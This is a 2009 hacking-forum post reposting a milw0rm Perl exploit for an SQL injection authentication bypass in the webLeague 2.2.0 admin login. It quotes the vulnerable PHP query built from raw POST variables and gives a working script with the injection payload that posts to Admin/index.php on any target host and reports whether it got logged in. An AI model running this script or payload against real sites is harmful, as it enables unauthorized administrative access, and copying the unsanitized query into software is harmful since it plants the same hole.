Multi Ethnic Hacking Group


    webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit

    Share

    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit

    Post by Foxi on Thu Jul 23, 2009 4:16 am

    Code:
    #!/usr/bin/perl -W
    #
    # WebLeague 2.2.0 Remote Admin Bypass p0c
    # written by ka0x <ka0x01[at]gmail.com>
    #
    # need magic_quotes_gpc = Off
    #
    # Vuln code (Admin/index.php) :
    #
    # 10:   $sql="SELECT * FROM $admintable WHERE name = '$_POST[username]' AND password = '$_POST[password]'"; // ---> NOT CLEAN $_POST VARS
    # 11:   $result=mysql_query($sql,$db);
    # 12:   $number = mysql_num_rows($result);
    # 13:   if ($number == "1") {
    #

    use LWP::UserAgent ;

    my $timeout = 10 ;

    die "* USAGE: \tperl $0 <host>\n" unless $ARGV[0] ;

    my $host = $ARGV[0] ;

    $host = 'http://'.$host if( $host !~ /^http:/ ) ;
    $host = $host.'/' unless( substr( $host, -1 ) eq '/' ) ;

    my $ua = LWP::UserAgent->new() or die;
    $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
    $ua->timeout( $timeout ) ;

    my $req = HTTP::Request->new( POST => $host.'Admin/index.php' );
    $req->content_type( 'application/x-www-form-urlencoded' ) ;
    $req->content( 'username=\'/*&password=*/ or \'\'=\'' ) ;    # content $_POST vars:
                            # username=  '/*
                            # password=  */ or ''='
    my $res = $ua->request( $req ) ;

    if( $res->content =~ /You are logged in as/i ){
       print "[+] The website is vulnerable." ;
    }
    else {
       print "[-] The website isn't vulnerable." ;
    }


    __END__

    # milw0rm.com [2009-07-16]


      Current date/time is Tue Feb 28, 2017 9:39 am